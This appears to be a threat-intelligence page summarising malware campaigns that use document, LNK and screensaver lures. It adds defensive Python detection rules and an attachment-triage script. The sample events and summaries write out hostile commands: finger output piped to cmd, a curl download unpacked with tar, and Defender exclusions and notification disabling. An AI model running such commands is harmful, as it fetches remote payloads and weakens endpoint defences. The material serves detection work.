Weaponized Document Lures Used to Deliver Malware and Remote Access
Multiple reports describe threat actors using document-themed lures to deliver malicious payloads while evading user scrutiny and defensive controls. ASEC-reported activity shows weaponized PDF files distributed via phishing (e.g., “Invoice,” “Payment”) that display a decoy image or a “Failed to load PDF document” error to push victims to click through to fake Google Drive/Adobe pages, ultimately installing legitimate RMM tools (e.g., Syncro, SuperOps, NinjaOne, ConnectWise ScreenConnect) signed with a valid certificate to blend in as administrative software rather than obvious malware.
Separately, research on APT36 / Transparent Tribe details a targeted espionage operation against Indian government, academic, and strategic entities using spear-phishing ZIP attachments containing oversized LNK files masquerading as PDFs; execution chains leverage mshta.exe to retrieve remote HTA content, decrypt and reconstruct payloads in memory, and deploy a RAT (tracked as ReadWriteRAT) with capabilities including encrypted C2, remote command execution, screenshot capture, clipboard access, and data theft. Other items in the set cover unrelated threats—WordPress SEO cloaking that selectively serves malicious content to verified Googlebot IP ranges, a vendor blog overview of Medusa ransomware activity, and reporting on CrazyHunter ransomware impacting Taiwan healthcare—indicating the commonality here is document/SEO deception techniques, not a single unified incident.
Related Stories

Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
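Process command-line rules a defender could run over endpoint telemetry for two behaviours named in the stories above: the Microsoft Defender setting tampering (exclusions, sample submission, notifications) from the Larva-25012 report, and the `finger ... | cmd` plus `curl`/`tar -xf` chain from the Scarlet Goldfinch update. This is an added example, not code or signatures from AhnLab, Fortinet or Red Canary; the regexes are this example's own choices, the record fields (`ProcessId`, `Image`, `CommandLine`) are assumptions modelled on Sysmon Event ID 1, and the sample events are constructed.

```python
"""Command-line detection rules for the behaviours described above (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


# Each rule is keyed to a behaviour the reports name; the regexes themselves are
# this example's assumptions, not published vendor signatures.
RULES = (
    # finger client output piped into a shell (remote content fetched via finger)
    Rule("finger_to_shell",
         re.compile(r"\bfinger(\.exe)?\s+\S+@\S+.*\|\s*(cmd|powershell)", re.I)),
    # curl download followed by tar extraction of the downloaded "document"
    Rule("curl_then_tar",
         re.compile(r"\bcurl\b.*\btar\s+-?x", re.I)),
    # Defender preference tampering through the MpPreference cmdlets
    Rule("defender_preference_tamper",
         re.compile(r"\b(Set|Add)-MpPreference\b.*-(Exclusion\w*|SubmitSamplesConsent"
                    r"|DisableRealtimeMonitoring)", re.I)),
    # Windows Security notifications disabled through the policy registry key
    Rule("defender_notifications_disabled",
         re.compile(r"Windows Defender Security Center\\Notifications.*DisableNotifications", re.I)),
)


def evaluate(command_line: str) -> list[str]:
    """Return the names of every rule that matches a single command line."""
    return [r.name for r in RULES if r.pattern.search(command_line)]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run the rules over process-creation records; field names are assumed."""
    hits = []
    for ev in events:
        matched = evaluate(ev.get("CommandLine", ""))
        if matched:
            hits.append((ev["ProcessId"], matched))
    return hits


# Constructed sample telemetry, modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c finger admin@203.0.113.10 | cmd"},
    {"ProcessId": 1002, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -o invoice.pdf http://example.invalid/i & tar -xf invoice.pdf -C C:\Users\Public"},
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -c Add-MpPreference -ExclusionPath C:\ProgramData\svc"},
    {"ProcessId": 1004, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f'},
    # A plain finger lookup with no shell on the other side of a pipe: no alert.
    {"ProcessId": 1005, "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": r"finger.exe alice@203.0.113.20"},
    {"ProcessId": 1006, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for pid, matched in scan(SAMPLE_EVENTS):
        print(pid, matched)
```

The rules deliberately key on the combination (finger output reaching a shell, a download immediately unpacked, a Defender preference being loosened) rather than on the presence of `finger.exe` or `curl.exe` alone, which are legitimate in most estates; tune the patterns to the PowerShell and shell syntax your logging actually records.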
Spearphishing Campaigns Abuse PDF and Windows Screensaver Files to Install Legitimate RMM Tools
Threat actors have been observed using spearphishing lures and *non-traditional* attachment types—particularly Windows screensaver (`.scr`) executables—to trick users into running code that silently installs legitimate **remote monitoring and management (RMM)** agents (e.g., **SimpleHelp**). ReliaQuest research described business-themed filenames (e.g., `InvoiceDetails.scr`, `ProjectSummary.scr`) delivered via links hosted on legitimate cloud services (e.g., GoFile), with the `.scr` format helping bypass controls that don’t treat screensavers as executables. Once installed, the RMM tooling provides interactive remote access that can enable data theft, lateral movement, and follow-on payload deployment, including ransomware, while blending into normal IT administration traffic. Separately, researchers also reported a spam operation using **fake PDF attachments** that display an error message and redirect victims to a lookalike *Adobe Acrobat* download flow that instead installs trusted, digitally signed RMM software to establish persistent access. A different phishing campaign used a multi-stage **PDF chain** hosted on reputable infrastructure (e.g., **Vercel Blob**) to redirect victims to a credential-harvesting page and exfiltrate stolen data via a **Telegram bot**, emphasizing how attackers are increasingly abusing high-reputation cloud platforms and document-based lures to evade email and web filtering (including scenarios where the initial email contains no malicious link and can pass SPF/DKIM/DMARC checks).
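Attachment triage for the lure formats that recur across these stories: the oversized LNK masquerading as a PDF inside a ZIP (the APT36 / Transparent Tribe report at the top of the page), the double-extension `*.txt.lnk` shortcut and the archive posing as a PDF (Fortinet and Red Canary stories), and the `.scr` screensaver executables described by ReliaQuest. This is an added example, not code from any of the cited vendors; the 64 KiB LNK size threshold, the check names and the sample archive are this example's own assumptions, constructed inline so it runs offline.

```python
"""Attachment triage for document-themed lure files (added example)."""
from __future__ import annotations

import io
import zipfile

# Shell link (.lnk) files begin with a 0x4C header size and the link CLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"
PDF_MAGIC = b"%PDF-"
PE_MAGIC = b"MZ"
DOC_EXTS = {".pdf", ".txt", ".doc", ".docx", ".xls", ".xlsx"}
# Assumed threshold: real shortcuts are a few KiB; padded lures are far larger.
LNK_SIZE_LIMIT = 64 * 1024


def inspect_member(name: str, data: bytes) -> list[str]:
    """Return the reasons a single file (by name and content) looks like a lure."""
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]
    exts = ["." + p for p in base.split(".")[1:]]
    last = exts[-1] if exts else ""

    # Shortcut detection by extension or by header, so renaming does not hide it.
    if last == ".lnk" or data.startswith(LNK_MAGIC):
        if len(exts) >= 2 and exts[-2] in DOC_EXTS:
            reasons.append("lnk_double_extension")      # e.g. Notice.pdf.lnk
        if len(data) > LNK_SIZE_LIMIT:
            reasons.append("lnk_oversized")             # padded shortcut
        if last != ".lnk":
            reasons.append("lnk_disguised_extension")   # LNK content, other name
    if last == ".scr":
        reasons.append("screensaver_executable")        # .scr is a PE executable
    if last in DOC_EXTS and data.startswith(PE_MAGIC):
        reasons.append("pe_with_document_extension")
    if last == ".pdf" and not data.startswith(PDF_MAGIC):
        reasons.append("pdf_header_mismatch")           # archive or other content named .pdf
    return reasons


def triage_zip(archive: bytes) -> dict[str, list[str]]:
    """Inspect every file in a ZIP attachment; returns only the flagged members."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = inspect_member(info.filename, zf.read(info))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a benign PDF, a padded LNK posing as a PDF, and a .scr stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Notice.pdf", b"%PDF-1.7\n% benign placeholder\n")
        zf.writestr("Notice.pdf.lnk", LNK_MAGIC + b"\x00" * (LNK_SIZE_LIMIT + 4096))
        zf.writestr("InvoiceDetails.scr", PE_MAGIC + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_archive()).items():
        print(member, reasons)
```

`inspect_member` can also be called directly on a standalone download such as a `.scr` fetched from a file-sharing link, or on a file named `.pdf` that a `curl` step wrote to disk, which is the "archive masquerading as a PDF" case; checking both the extension chain and the file header is what keeps the screensaver and renamed-shortcut variants from slipping past a name-only filter.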